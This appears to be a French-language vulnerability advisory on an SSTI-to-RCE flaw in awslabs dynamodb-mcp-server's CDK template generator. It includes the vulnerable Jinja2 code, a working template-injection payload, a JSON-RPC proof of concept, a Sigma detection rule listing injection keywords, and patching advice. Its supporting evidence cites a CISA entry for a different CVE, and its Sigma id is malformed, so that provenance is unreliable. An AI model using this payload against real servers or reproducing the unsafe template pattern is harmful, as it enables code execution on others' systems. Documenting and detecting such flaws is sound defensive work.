CVE-2026-85654 : injection de template SSTI et RCE dans awslabs dynamodb-MCP-Server
HERMES
SCORE DE MENACE HERMES & ÉVALUATION D'INFRASTRUCTURE AGENTIQUE
Cible :awslabs dynamodb-mcp-server (awslabs.dynamodb_mcp_server.cdk_generator (Template Engine)) Confiance : 98%
97 / 100
Décomposition des dimensions
Exploitabilité 19 / 20
Activité de menace 18 / 20
Militarisation 18 / 20
Exposition 18 / 20
Prévalence 17 / 20
Impact 19 / 20
Maturité de l'exploit 18 / 20
Potentiel d'attaque en chaîne 18 / 20
Divergence & Justification opérationnelle
Le score CVSS v3.1 est de 9.8 (Critique) et le score Hermes Threat Score est calculé à 97 (CRITIQUE). La génération automatique de code d'infrastructure par des assistants IA via ce composant MCP expose le serveur à une exécution de code sans restriction.
🕸️ Graphe de connaissances connecté & Provenance
CVE-2026-85654: awslabs dynamodb-mcp-server CDK Generator Template Injection RCEVULNÉRABILITÉ
Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTAWS MCP Server Suite
98% VERY_HIGH
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in AWS MCP Server Suite documented in Hermes dossier.”
Preuves vérifiées associées :
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Contexte technique & matrice d’impact
Section intitulée « 1. Contexte technique & matrice d’impact »| Paramètre | Spécification Technique | Contexte de Menace |
|---|---|---|
| Identifiant CVE | CVE-2026-85654 | Menaces IA Agentique & Protocole MCP |
| Produit ciblé | awslabs dynamodb-mcp-server | Amazon Web Services / MCP Community |
| Composant affecté | awslabs.dynamodb_mcp_server.cdk_generator (Template Engine) | Orchestrateur et couche d’outils agentiques |
| Nature de la faille | CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine (SSTI) | Violation d’intégrité et d’exécution |
| Versions vulnérables | all versions prior to 0.4.3 | Environnements en production |
| Correctif disponible | 0.4.3 | Mise à jour impérative |
2. Analyse technique approfondie
Section intitulée « 2. Analyse technique approfondie »Analyse de l’injection de template
Section intitulée « Analyse de l’injection de template »La fonction generate_cdk_template() concaténait directement les paramètres reçus du client MCP :
# Concaténation non sécurisée dans le templatetemplate_str = f"""from aws_cdk import aws_dynamodb as dynamodbtable = dynamodb.Table( self, '{params.get('table_name')}', partition_key=dynamodb.Attribute(name='{params.get('partition_key')}', type=dynamodb.AttributeType.STRING))"""template = jinja2.Template(template_str)return template.render()L’injection de la chaîne {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }} déclenche l’exécution immédiate du binaire id lors du rendu Jinja2.
+----------------------------------------------------------------------------------------------------+| CYCLE D'ATTAQUE CVE-2026-85654 |+----------------------------------------------------------------------------------------------------+
[Attaquant / Injection de Prompt] │ │ [1] Émission du payload ciblant l'interface d'outil ou l'orchestrateur ▼ [awslabs dynamodb-mcp-server] │ ├───► 1. Ingestion par awslabs.dynamodb_mcp_server.cdk_generator (Template Engine) │ - Échec de validation, absence de filtrage ou contournement de sandbox │ ├───► 2. Exécution / Mutation d'état │ - Exécution de commandes OS ou exfiltration d'identifiants │ ▼ [Infrastructure Cible Compromise] │ └───► Vol de données, prise de contrôle du serveur ou persistance+----------------------------------------------------------------------------------------------------+3. Preuve de concept (PoC) & analyse du payload
Section intitulée « 3. Preuve de concept (PoC) & analyse du payload »{ "jsonrpc": "2.0", "id": 42, "method": "tools/call", "params": { "name": "generate_table_cdk", "arguments": { "table_name": "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}", "partition_key": "id" } }}4. Ingénierie de détection & télémétrie
Section intitulée « 4. Ingénierie de détection & télémétrie »Règle de détection Sigma
Section intitulée « Règle de détection Sigma »title: DynamoDB MCP Server Template Injectionid: 85654c01-e654-4a1b-8f21-dynamodbmcp01status: highdescription: Detects Jinja2 template injection syntax in JSON-RPC tool parameters destined for DynamoDB MCP server.author: Hermes Codex Detection Engineeringdate: 2026-09-06logsource: product: mcp service: dynamodb_serverdetection: selection: payload|contains: - '__globals__' - '__builtins__' - 'popen' - '__import__' condition: selectionlevel: critical5. Guide de remédiation & plan d’action
Section intitulée « 5. Guide de remédiation & plan d’action »- Appliquer les correctifs : mettre à jour
awslabs dynamodb-mcp-serververs la version0.4.3sans délai. - Restreindre les outils MCP : vérifier les déclarations d’outils et isoler les exécutions dans des conteneurs sandboxés éphémères.
- Auditer les journaux système : examiner les logs d’exécution pour repérer d’éventuels processus enfants anormaux ou appels réseau suspects.
- Appliquer le moindre privilège : restreindre les comptes de service associés aux agents sur les bases de données et les clés cloud.